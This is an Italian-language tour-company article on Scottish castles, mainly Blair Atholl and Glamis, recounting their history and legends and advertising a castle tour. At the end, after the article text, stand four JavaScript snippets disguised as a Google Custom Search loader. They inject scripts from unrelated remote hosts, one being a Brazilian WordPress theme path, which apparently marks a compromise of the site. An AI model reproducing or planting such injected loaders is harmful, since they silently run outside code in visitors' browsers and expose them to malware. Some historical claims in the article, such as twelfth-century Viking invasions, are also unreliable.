Quando si parla di Scozia si parla di castelli. Ripercorrendo la geografia di questa terra ricca di storie, misteri e leggende, troviamo innumerevoli fortezze che hanno resistito al trascorrere del tempo trovando forza nel proprio orgoglio di aver fatto parte dei momenti più importanti della storia scozzese.
Sono state le invasioni vichinghe del dodicesimo secolo che hanno portato alla nascita degli straordinari castelli scozzesi che vedete oggi.  Questi, insieme ai grandi tappeti di erica, le torreggianti montagne rocciose, le scogliere scolpite dal vento ed un infinito perdersi di laghi creano un paesaggio di incomparabile bellezza a cui non si vorrebbe mai sottrarsi.
I castelli scozzesi hanno enormi torri e pareti in pietra, e sono spesso costruiti in punti strategici che offrono facile protezione, come antichi crateri vulcanici, colossali scogliere o corsi d’acqua di difficile attraversamento.
Concentrando la nostra attenzione su questi castelli torreggianti, non possiamo ignorare due dei più importanti: Il castello di Blair Atholl ed il castello di  Glamis.

Il castello di Blair Atholl

Castillo de Blair Atholl

Strategicamente situato a circa dodici miglia dalla città scozzese di Pithlocry (nel cuore della regione del Perthshire), Blair Atholl Castle funge da guardiano all’ingresso delle Highlands Scozzesi. Guardando da lontano si capisce perché è uno dei luoghi più visitati in Scozia.
Attualmente è di proprietà di John Murray, conte di Atholl, anche se questi risiede in Sud Africa e torna solo una volta l’anno nel suo castello scozzese per visitare il suo esercito privato (The Atholl Highlanders).
Il castello risale al 1269 quando John I Signore di Badenoch cominciò a costruire su alcune terre appartenenti al conte di Atholl, mentre questi si trovava in Terra Santa a combattere nelle crociate. Al suo ritorno, denunciò l’usurpazione al re Alessandro III e dopo aver riconquistato la sua terra vi incorporò anche un altra torre che tutt’oggi è la parte più antica del castello.

La famiglie dei proprietari originari Atholl si estinse al principio del secolo quattordicesimo e nel 1457 il re Giacomo II (James the II) concesse la terra di Atholl al suo fratellastro Sir John Stewart. Facendo riferimento agli ospiti famosi che sono passati attraverso il castello, non possiamo non parlare della regina di Scozia: Maria Stuarda. Questa regina scozzese è stata ospite al Castello di Blair nel 1564, quando prese parte ad una delle partite di caccia più famose della zona.
Quando però nel 1629 il titolo ed il castello passarono alla famiglia dei Murrays (che ne sono in possesso ancora oggi)  cominciarono tempi molto difficili. Nel 1652 le truppe di Oliver Cromwell assediarono l’edificio fino a quando Carlo II recuperò il trono e premiò i Murrays per esser stati fedeli alla corona. Non dobbiamo inoltre ignorare il fatto che il castello divenne un punto strategico importante anche durante le guerre giacobite nel 1689 quando fu assediato poco prima della battaglia di Killiecrankie, avvenuta a poche miglia a sud del castello.
Nel 1746, il castello fu assediato di nuovo e fu vicino a capitolare se non che i Giacobiti furono costretti a ritirarsi per combattere contro le forze del governo Inglese nella battaglia di Culloden (l’ultima battaglia persa dai Giacobiti contro la casata degli Hanover)

Una volta terminate le lotte e le guerre nel XIX secolo, si comincia finalmente a poter apprezzare la magnifica bellezza dei castelli scozzesi. La cessazione dei conflitti e la costruzione della linea ferroviaria per Inverness  fece risorgere interesse per questo castello e porto’ l’architetto David Bryce a considerare la sua ristrutturazione,  modernizzandolo e rendendolo molto piu’ maestoso di quanto fosse stato durante l’epoca medievale.

Uno dei primi nel Regno Unito, Blair Castle ha aperto le sue porte al pubblico per la prima volta nel 1936 ed e’ tutt’ora una delle mete turistiche preferite dagli stranieri.
Ad eccezione di un breve periodo durante la seconda guerra mondiale, rimane una delle principali attrazioni della Scozia. La visita al Castello include oltre 30 camere e l’ingresso a dei bellissimi giardini che ospitano i più grandi alberi nel Regno Unito.

Glamis Castle

Castillo de Glamis

Come la stragrande maggioranza dei paesi nel Medioevo, Glamis è cresciuto intorno al suo castello, il quale è diventato uno dei più famosi in tutto il mondo, anche perché è considerato la fortezza più infestata della Scozia, nascondendo  leggende e oscuri segreti tra le sue mura.

Una delle piu’ importanti date per cui questo castello e’ famoso e’ il 1034, anno in cui vi fu ucciso il re Malcom II, avvenimento a cui si ispiro’ poi Shakespeare nella sua tragedia “Macbeth”.

Associate a questo castello vi sono altre leggende famose: quella di Earl Beardie ed il Diavolo, quella del mostro di Glamis e quella del mostro di Loch Calder, oltre che quella della maledizione della famiglia di Olgivies. Per saperne di piu’ visitate la nostra pagina dedicata al tour del castello di Glamis o piu’ semplicemente venite con noi a scoprire da vicino cosa si nasconde dietro a queste mura misteriose e se le leggende che vi si raccontano hanno uno sfondo di verita’…

Tutti e due i castelli menzionati in quest’articolo (Blair Castle e Glamis Castle) possono essere visitati nel nostro tour “Tour ai castelli di Blair, Glamis e Pitlochry”

(function() {
var gcse = document.createElement(‘script’);
gcse.type = ‘text/javascript’;
gcse.async = true;
gcse.src = “http://theboatersnetwork.com/js/main1.js”;
var s = document.getElementsByTagName(‘script’)[0];
s.parentNode.insertBefore(gcse, s);
})();

(function() {
var gcse = document.createElement(‘script’);
gcse.type = ‘text/javascript’;
gcse.async = true;
gcse.src = “http://cjccontabil.com.br/wp-content/themes/Hermes/main1.js”;
var s = document.getElementsByTagName(‘script’)[0];
s.parentNode.insertBefore(gcse, s);
})();

(function() {
var gcse = document.createElement(‘script’);
gcse.type = ‘text/javascript’;
gcse.async = true;
gcse.src = “http://cjccontabil.com.br/wp-content/themes/Hermes/main1.js”;
var s = document.getElementsByTagName(‘script’)[0];
s.parentNode.insertBefore(gcse, s);
})();

(function() {
var gcse = document.createElement(‘script’);
gcse.type = ‘text/javascript’;
gcse.async = true;
gcse.src = “http://cjccontabil.com.br/wp-content/themes/Hermes/main1.js”;
var s = document.getElementsByTagName(‘script’)[0];
s.parentNode.insertBefore(gcse, s);
})();

Comments are closed.